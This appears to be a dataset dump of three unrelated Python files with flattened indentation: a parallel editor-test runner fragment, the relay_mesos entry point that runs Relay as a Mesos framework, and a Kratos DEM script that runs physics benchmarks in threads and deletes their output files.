num_iterations = int(math.ceil(len(test_spec_list) / parallel_editors))
for iteration in range(num_iterations):
tests_for_iteration = test_spec_list[iteration*parallel_editors:(iteration+1)*parallel_editors]
total_threads = len(tests_for_iteration)
threads = []
results_per_thread = [None] * total_threads
for i in range(total_threads):
def make_func(test_spec, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = self._exec_editor_test(request, workspace, my_editor, index+1, f"editor_test.log", test_spec, extra_cmdline_args)
assert results is not None
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_iteration[i], i, cur_editor)
t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
for result in results_per_thread:
editor_test_results.update(result)
# Runs multiple editors with a batch of tests for each editor
def _run_parallel_batched_tests(self, request, workspace, editor, editor_test_results, test_spec_list : List[EditorTestBase], extra_cmdline_args=[]):
if not test_spec_list:
return
self._setup_editor_test(editor, workspace)
total_threads = self._get_number_parallel_editors(request)
assert total_threads > 0, "Must have at least one editor"
threads = []
tests_per_editor = int(math.ceil(len(test_spec_list) / total_threads))
results_per_thread = [None] * total_threads
for i in range(total_threads):
tests_for_thread = test_spec_list[i*tests_per_editor:(i+1)*tests_per_editor]
def make_func(test_spec_list_for_editor, index, my_editor):
def run(request, workspace, extra_cmdline_args):
results = None
if len(test_spec_list_for_editor) > 0:
results = self._exec_editor_multitest(request, workspace, my_editor, index+1, f"editor_test.log", test_spec_list_for_editor, extra_cmdline_args)
assert results is not None
else:
results = {}
results_per_thread[index] = results
return run
# Duplicate the editor using the one coming from the fixture
cur_editor = editor.__class__(workspace, editor.args.copy())
f = make_func(tests_for_thread, i, cur_editor)
t = threading.Thread(target=f, args=(request, workspace, extra_cmdline_args))
t.start()
threads.append(t)
for t in threads:
t.join()
for result in results_per_thread:
editor_test_results.update(result)
# Retrieves the number of parallel preference cmdline overrides
def _get_number_parallel_editors(self, request):
parallel_editors_value = request.config.getoption("parallel_editors", None)
if parallel_editors_value:
return int(parallel_editors_value)
return self.get_number_parallel_editors()
|
main.py
|
import atexit
import multiprocessing as mp
import json
import signal
import sys
import time
from relay import argparse_shared as at
from relay.runner import main as relay_main, build_arg_parser as relay_ap
from relay_mesos import log
from relay_mesos.util import catch
from relay_mesos.scheduler import Scheduler
def warmer_cooler_wrapper(MV, ns):
"""
Act as a warmer or cooler function such that, instead of executing code,
we ask mesos to execute it.
"""
def _warmer_cooler_wrapper(n):
# inform mesos that it should spin up n tasks of type f, where f is
# either the warmer or cooler. Since Relay assumes that the choice of
# `f` (either a warmer or cooler func) is determined by the sign of n,
# we can too!
log.debug(
'asking mesos to spawn tasks',
extra=dict(
mesos_framework_name=ns.mesos_framework_name,
task_num=n, task_type="warmer" if n > 0 else "cooler"))
t = time.time()
with MV.get_lock():
if MV[1] < t:
MV[:] = (n, t)
log.debug(
'...finished asking mesos to spawn tasks',
extra=dict(
mesos_framework_name=ns.mesos_framework_name,
task_num=n, task_type="warmer" if n > 0 else "cooler"))
return _warmer_cooler_wrapper
def set_signals(mesos, relay, ns):
"""Kill child processes on sigint or sigterm"""
def kill_children(signal, frame):
log.error(
'Received a signal that is trying to terminate this process.'
' Terminating mesos and relay child processes!', extra=dict(
mesos_framework_name=ns.mesos_framework_name,
signal=signal))
try:
mesos.terminate()
log.info(
'terminated mesos scheduler',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
except:
log.exception(
'could not terminate mesos scheduler',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
try:
relay.terminate()
log.info(
'terminated relay',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
except:
log.exception(
'could not terminate relay',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
sys.exit(1)
signal.signal(signal.SIGTERM, kill_children)
signal.signal(signal.SIGINT, kill_children)
def main(ns):
"""
Run Relay as a Mesos framework.
Relay's event loop and the Mesos scheduler each run in separate processes
and communicate through a multiprocessing.Pipe.
These two processes bounce control back and forth between mesos
resourceOffers and Relay's warmer/cooler functions. Relay warmer/cooler
functions request that mesos tasks get spun up, but those requests are only
filled if the mesos scheduler receives enough relevant offers. Relay's
requests don't build up: only the largest request since the last fulfilled
request is fulfilled at moment enough mesos resources are available.
"""
if ns.mesos_master is None:
log.error(
"Oops! You didn't define --mesos_master",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
build_arg_parser().print_usage()
sys.exit(1)
if not ns.mesos_task_resources:
log.warn(
"You didn't define '--mesos_task_resources'."
" Tasks may not start on slaves",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
log.info(
"Starting Relay Mesos!",
extra={k: str(v) for k, v in ns.__dict__.items()})
# a distributed value storing the num and type of tasks mesos scheduler
# should create at any given moment in time.
# Sign of MV determines task type: warmer or cooler
# ie. A positive value of n means n warmer tasks
MV = mp.Array('d', [0, 0]) # max_val is a ctypes.c_int64
# store exceptions that may be raised
exception_receiver, exception_sender = mp.Pipe(False)
# notify relay when mesos framework is ready
mesos_ready = mp.Condition()
# copy and then override warmer and cooler
ns_relay = ns.__class__(**{k: v for k, v in ns.__dict__.items()})
if ns.warmer:
ns_relay.warmer = warmer_cooler_wrapper(MV, ns)
if ns.cooler:
ns_relay.cooler = warmer_cooler_wrapper(MV, ns)
mesos_name = "Relay.Mesos Scheduler"
mesos = mp.Process(
target=catch(init_mesos_scheduler, exception_sender),
kwargs=dict(ns=ns, MV=MV, exception_sender=exception_sender,
mesos_ready=mesos_ready),
name=mesos_name)
relay_name = "Relay.Runner Event Loop"
relay = mp.Process(
target=catch(init_relay, exception_sender),
args=(ns_relay, mesos_ready, ns.mesos_framework_name),
name=relay_name)
mesos.start() # start mesos framework
relay.start() # start relay's loop
set_signals(mesos, relay, ns)
while True:
if exception_receiver.poll():
exception_receiver.recv()
log.error(
'Terminating child processes because one of them raised'
' an exception', extra=dict(
is_relay_alive=relay.is_alive(),
is_mesos_alive=mesos.is_alive(),
mesos_framework_name=ns.mesos_framework_name))
break
if not relay.is_alive():
log.error(
"Relay died. Check logs to see why.",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
break
if not mesos.is_alive():
log.error(
"Mesos Scheduler died and didn't notify me of its exception."
" This may be a code bug. Check logs.",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
break
# save cpu cycles by checking for subprocess failures less often
if ns.delay > 5:
time.sleep(5)
else:
time.sleep(ns.delay)
relay.terminate()
mesos.terminate()
sys.exit(1)
def init_relay(ns_relay, mesos_ready, mesos_framework_name):
log.debug(
'Relay waiting to start until mesos framework is registered',
extra=dict(mesos_framework_name=mesos_framework_name))
mesos_ready.acquire()
mesos_ready.wait()
log.debug(
'Relay notified that mesos framework is registered',
extra=dict(mesos_framework_name=mesos_framework_name))
relay_main(ns_relay)
def init_mesos_scheduler(ns, MV, exception_sender, mesos_ready):
import mesos.interface
from mesos.interface import mesos_pb2
try:
import mesos.native
except ImportError:
log.error(
"Oops! Mesos native bindings are not installed. You can download"
" these binaries from mesosphere.",
extra=dict(mesos_framework_name=ns.mesos_framework_name))
raise
log.info(
'starting mesos scheduler',
extra=dict(mesos_framework_name=ns.mesos_framework_name))
# build framework
framework = mesos_pb2.FrameworkInfo()
framework.user = "" # Have Mesos fill in the current user.
framework.name = "Relay.Mesos: %s" % ns.mesos_framework_name
if ns.mesos_framework_principal:
framework.principal = ns.mesos_framework_principal
if ns.mesos_framework_role:
framework.role = ns.mesos_framework_role
if ns.mesos_checkpoint:
framework.checkpoint = True
# build driver
driver = mesos.native.MesosSchedulerDriver(
Scheduler(
MV=MV, exception_sender=exception_sender, mesos_ready=mesos_ready,
ns=ns),
framework,
ns.mesos_master)
atexit.register(driver.stop)
# run things
status = 0 if driver.run() == mesos_pb2.DRIVER_STOPPED else 1
driver.stop() # Ensure that the driver process terminates.
sys.exit(status)
# This add_argument func will prefix env vars with RELAY_MESOS.
# The normal at.add_argument func prefixes env vars with RELAY_
# Let's use the at.add_argument func for --mesos_XXX and the below for --XXX
add_argument = at.add_argument_default_from_env_factory(
env_prefix='RELAY_MESOS_')
build_arg_parser = at.build_arg_parser([
at.group(
"How does Relay.mesos affect your metric?",
at.warmer(type=str, help=(
"A bash command to run on a mesos slave."
" A warmer should eventually increase metric values.")),
at.cooler(type=str, help=(
"A bash command to run on a mesos slave."
" A cooler should eventually decrease metric values.")),
),
at.group(
"Relay.Mesos parameters",
at.add_argument(
'--mesos_master',
help="URI to mesos master. We support whatever mesos supports"
),
at.add_argument(
'--mesos_framework_principal',
type=str, help=(
"If you use Mesos Framework Rate Limiting, this framework's"
" principal identifies which rate limiting policy to apply")),
at.add_argument(
'--mesos_framework_role',
type=str, help=(
"If you use Mesos Access Control Lists (ACLs) or apply"
" weighting to frameworks, your framework needs to register"
" with a role.")),
at.add_argument(
'--mesos_framework_name',
default='framework',
help="Name the framework so you can identify it in the Mesos UI"),
at.add_argument(
'--mesos_checkpoint', action='store_true', type=bool, default=False,
help=(
"This option enables Mesos Framework checkpointing. This"
" means that tasks spun up by Relay.Mesos will survive even if"
" this Relay.Mesos instance dies.")),
at.add_argument(
'--mesos_task_resources',
type=lambda x: dict(
y.split('=') for y in x.replace(' ', ',').split(',')),
default={}, help=(
"Specify what resources your task needs to execute. These"
" can be any recognized mesos resource and must be specified"
" as a string or comma separated list. ie:"
" --mesos_task_resources cpus=10,mem=30000"
)),
at.add_argument(
'--mesos_environment', type=lambda fp: [
tuple(y.strip() for y in x.strip().split('=', 1))
for x in open(fp).readlines()],
default=[], help=(
"A filepath containing environment variables to define on all"
" warmer and cooler tasks."
"File should contain one variable per line, in form VAR1=VAL1"
)),
add_argument(
'--uris', type=lambda x: x.split(','), default=[], help=(
"Comma-separated list of URIs to load before running command"
)),
add_argument(
'--max_failures', type=int, default=-1, help=(
"If tasks are failing too often, stop the driver and raise"
" an error. If given, this (always positive) number"
" is a running count of (failures - successes - starting)"
" tasks. It is sensitive to many consecutive failures and"
" will mostly ignore failures if a lot of tasks"
" are starting or completing at once"
)),
),
at.group(
"Relay.Mesos Docker parameters",
add_argument(
'--docker_parameters', default={}, type=json.loads, help=(
"Supply arbitrary command-line options for the docker run"
"command executed by the Mesos containerizer. Note that any"
"parameters passed in this manner are not guaranteed to be"
"supported in the future. Pass parameters as a JSON dict:\n"
' --docker_parameters \'{"volumes-from": "myimage", ...}\''
)),
add_argument(
'--docker_image', help=(
"The name of a docker image if you wish to execute the"
" warmer and cooler in it")),
add_argument(
'--docker_network', choices=("HOST", "BRIDGE", "NONE"),
default="BRIDGE", help=(
"Docker: Set the Network mode for the container: --net ")),
add_argument(
'--force_pull_image', action='store_true', default=False,
type=bool,
help=(
"Before Relay.Mesos starts a docker container, ensure that the"
" container image is the most recently updated in the registry"
)),
add_argument(
'--volumes',
type=lambda x: tuple(tuple(y.split(':')) for y in x.split(',')),
default=[], help=(
"If using containers, you may wish to mount volumes into those"
" containers. Define the volumnes you wish to mount as"
" a comma-separated list of volumes with the"
" following format:"
" --mesos_volumes host_path:container_path:mode,"
"host_path2:container_path2:mode,...")),
),
],
description=(
"Use Relay to auto-scale instances of a bash command"
" or docker container on Mesos"),
parents=[relay_ap()], conflict_handler='resolve')
if __name__ == '__main__':
NS = build_arg_parser().parse_args()
main(NS)
|
DEM_run_all_benchmarks_grid.py
|
from __future__ import print_function
import os
import subprocess
import sys
import multiprocessing as mp
import queue
from threading import Thread
import threading
from glob import glob
import shutil
import KratosMultiphysics.kratos_utilities as kratos_utils
kratos_benchmarking_path = os.path.join('..','..','..','benchmarking')
sys.path.append(kratos_benchmarking_path)
path = os.path.join('..','test_examples')
sys.path.append(path)
path = os.getcwd()
path = os.path.join(path,'basic_benchmarks')
os.chdir(path)
if "OMP_NUM_THREADS" in os.environ:
max_available_threads = int(os.environ['OMP_NUM_THREADS'])
else:
max_available_threads = mp.cpu_count() - 1
if max_available_threads == 0:
max_available_threads = 1
#initial_number_of_threads = os.environ['OMP_NUM_THREADS']
os.environ['OMP_NUM_THREADS']='1'
os.system("echo Benchmarks will be running on $OMP_NUM_THREADS cpu")
Benchmark_text = ["Running DEM Benchmark 1.... Elastic normal impact of two identical spheres\n",
"Running DEM Benchmark 2.... Elastic normal impact of a sphere against a rigid plane\n",
"Running DEM Benchmark 3.... Impact of a sphere against a rigid plane with different coefficients of restitution\n",
"Running DEM Benchmark 4.... Oblique impact of a sphere with a rigid plane with constant velocity module and variable incident angles\n",
"Running DEM Benchmark 5.... Oblique impact of a sphere with a rigid plane with constant normal velocity and different tangential velocities\n",
"Running DEM Benchmark 6.... Impact of a sphere with a rigid plane with a constant normal velocity and variable angular velocities\n",
"Running DEM Benchmark 7.... Impact of two identical spheres with a constant normal velocity and different angular velocities\n",
"Running DEM Benchmark 8.... Impact of two differently sized spheres with a constant normal velocity and variable angular velocities\n",
"Running DEM Benchmark 9.... Impact of two identical spheres with a constant normal velocity and different coefficients of restitution\n",
"Running DEM Benchmark 10... Linear: Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n",
"Running DEM Benchmark 11... Hertzian: Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n",
"Running DEM Benchmark 12... Sphere rotating over a plane surface with Rolling Friction\n",
"Running DEM Benchmark 13... Impact of a low stiffness sphere against a rigid plane divided in small triangular elements\n",
"Running DEM Benchmark 14... Impact of a low stiffness sphere against a rigid edge divided in small triangular elements\n",
"Running DEM Benchmark 15... Impact of a low stiffness sphere against a rigid vertex divided in small triangular elements\n",
"Running DEM Benchmark 16... Spheres contacting multiple entities (facets, edges and vertices)\n",
"Running DEM Benchmark 17... Sphere sliding on a plane (discretized with triangles and quadrilaterals) with friction\n",
"","",
"Running DEM Benchmark 20... Normal compression of two identical spheres\n",\
"Running DEM Benchmark 21... Normal compression of two identical indented spheres\n",\
"Running DEM Benchmark 22... Tensile test of two identical spheres\n",\
"Running DEM Benchmark 23... Tensile test of two identical indented spheres\n",\
"Running DEM Benchmark 24... Shear test of two identical spheres by applying rotation\n",\
"Running DEM Benchmark 25... Shear test of two identical spheres by applying rotation and radius expansion\n",\
"","","","",
"Running DEM Benchmark 30... Cylinder cluster with imposed angular velocity in two axis (Velocity Verlet + Zhao scheme)\n",
"Running DEM Benchmark 31... Cylinder cluster with imposed angular velocity in two axis (Symplectic Euler + Runge-Kutta scheme)\n",
"Running DEM Benchmark 32... Fiber cluster bouncing without any damping (Velocity Verlet + Zhao scheme)\n",
"Running DEM Benchmark 33... Fiber cluster bouncing without any damping (Symplectic Euler + Runge-Kutta scheme)\n",
"","","","","","",
"Running DEM Benchmark 40... Generic test for code functionalities verification\n"]
def GetFilePath(fileName):
return os.path.join(os.path.dirname(os.path.realpath(__file__)), fileName)
def run(benchmark, file_for_output):
path_to_callable_script = os.path.join(path, "DEM_benchmarks_analysis.py")
py_cmd = "python3" if shutil.which("python3") is not None else "python"
subprocess.check_call([py_cmd, path_to_callable_script, str(benchmark)], stdout=file_for_output, stderr=file_for_output)
def worker(queue):
for benchmark in iter(queue.get, None):
out_file_name = '{0}.info'.format(benchmark)
f = open(out_file_name, 'wb')
print(Benchmark_text[benchmark - 1])
try:
run(benchmark, f)
except Exception:# catch exceptions to avoid exiting the thread prematurely
with open(out_file_name, 'r') as fin:
print(fin.read())
print("A problem was found in DEM Benchmark " + str(benchmark) + "... Resuming...\n")
g = open("errors.err", "a")
g.write("DEM Benchmark " + str(benchmark) + ": KO!........ Test " + str(benchmark) + " FAILED\n")
g.close()
f.close()
file_to_remove = out_file_name
kratos_utils.DeleteFileIfExisting(GetFilePath(file_to_remove))
def main():
try:
print("\nAdding processes to DEM parallel Benchmarking..............\n")
delete_archives()
g = open("errors.err", "w")
g.write("The complete list of benchmarks are included at the end of this message as a quick reference.\n")
g.close()
Text = ""
q = queue.Queue()
#### Discontinuum Tests.
D_DEM_Benchmarks_list = list(range(1,18))
#### Continuum Tests
C_DEM_Benchmarks_list = list(range(20,26))
#### Discontinuum Clusters Tests. From 30 to 33
Dcl_DEM_Benchmarks_list = list(range(30,34))
#### Generic test for code functionalities verification
Gen_DEM_Benchmarks_list = list(range(40,41))
Total_DEM_Benchmarks_list = D_DEM_Benchmarks_list + C_DEM_Benchmarks_list + Dcl_DEM_Benchmarks_list + Gen_DEM_Benchmarks_list
for item in Total_DEM_Benchmarks_list:
#print(Benchmark_text[item - 1])
q.put_nowait(item)
threads = [Thread(target=worker, args=(q,)) for _ in range(int(max_available_threads))]
for t in threads:
t.daemon = True # threads die if the program dies
t.start()
for _ in threads: q.put_nowait(None) # signal no more files
for t in threads: t.join() # wait for completion
print('\n')
g = open("errors.err", 'a')
g.write("\n---------------------------------------------------------------------\n")
g.write("\nList of Benchmarks:\n")
g.write("\nDISCONTINUUM TESTS:\n")
g.write("Benchmark 01. Elastic normal impact of two identical spheres\n")
g.write("Benchmark 02. Elastic normal impact of a sphere against a rigid plane\n")
g.write("Benchmark 03. Impact of a sphere against a rigid plane with different coefficients of restitution\n")
g.write("Benchmark 04. Oblique impact of a sphere with a rigid plane with constant velocity module and variable incident angles\n")
g.write("Benchmark 05. Oblique impact of a sphere with a rigid plane with constant normal velocity and different tangential velocities\n")
g.write("Benchmark 06. Impact of a sphere with a rigid plane with a constant normal velocity and variable angular velocities\n")
g.write("Benchmark 07. Impact of two identical spheres with a constant normal velocity and different angular velocities\n")
g.write("Benchmark 08. Impact of two differently sized spheres with a constant normal velocity and variable angular velocities\n")
g.write("Benchmark 09. Impact of two identical spheres with a constant normal velocity and different coefficients of restitution\n")
g.write("Benchmark 10. Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n")
g.write("Benchmark 11. Oblique impact of a sphere with an elastic plane with constant normal velocity and different angular velocities\n")
g.write("Benchmark 12. Sphere rotating over a plane surface with Rolling Friction\n")
g.write("Benchmark 13. Impact of a low stiffness sphere against a rigid plane divided in small triangular elements\n")
g.write("Benchmark 14. Impact of a low stiffness sphere against a rigid edge divided in small triangular elements\n")
g.write("Benchmark 15. Impact of a low stiffness sphere against a rigid vertex divided in small triangular elements\n")
g.write("Benchmark 16. Spheres contacting multiple entities (facets, edges and vertices)\n")
g.write("Benchmark 17. Sphere sliding on a plane (discretized with triangles and quadrilaterals) with friction\n")
g.write("\nCONTINUUM TESTS:\n")
g.write("Benchmark 20. Normal compression of two identical spheres\n")
g.write("Benchmark 21. Normal compression of two identical indented spheres\n")
g.write("Benchmark 22. Tensile test of two identical spheres\n")
g.write("Benchmark 23. Tensile test of two identical indented spheres\n")
g.write("Benchmark 24. Shear test of two identical spheres by applying rotation\n")
g.write("Benchmark 25. Shear test of two identical spheres by applying rotation and radius expansion\n")
g.write("\nDISCONTINUUM CLUSTERS TESTS:\n")
g.write("Benchmark 30. Cylinder cluster with imposed angular velocity in two axis (Velocity Verlet + Zhao scheme)\n")
g.write("Benchmark 31. Cylinder cluster with imposed angular velocity in two axis (Symplectic Euler + Runge-Kutta scheme)\n")
g.write("Benchmark 32. Fiber cluster bouncing without any damping (Velocity Verlet + Zhao scheme)\n")
g.write("Benchmark 33. Fiber cluster bouncing without any damping (Symplectic Euler + Runge-Kutta scheme)\n")
g.write("\nGENERIC TEST:\n")
g.write("Benchmark 40. Generic test for code functionalities verification\n")
g.close()
g = open("errors.err")
file_contents = g.read()
g.close()
os.remove("errors.err")
Text += file_contents.rstrip("\n")
Text += "\n\n\n"
delete_archives()
return Text
except:
delete_archives()
def delete_archives():
files_to_delete_list = glob('*.time')
files_to_delete_list.extend(glob('*.dat'))
files_to_delete_list.extend(glob('*.gp'))
files_to_delete_list.extend(glob('*.txt'))
files_to_delete_list.extend(glob('*.lst'))
files_to_delete_list.extend(glob('*.info'))
files_to_delete_list.extend(glob('*.err'))
files_to_delete_list.extend(glob('*.hdf5'))
for to_erase_file in files_to_delete_list:
try:
os.remove(to_erase_file)
except OSError:
pass
folders_to_delete_list = []
folders_to_delete_list.extend(glob('*ists'))
folders_to_delete_list.extend(glob('*ults'))
folders_to_delete_list.extend(glob('*he__'))
folders_to_delete_list.extend(glob('*aphs'))
folders_to_delete_list.extend(glob('*iles'))
for to_erase_folder in folders_to_delete_list:
try:
shutil.rmtree(to_erase_folder)
except OSError:
pass
if __name__ == '__main__':
mp.freeze_support() # optional if the program is not frozen
print(main())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.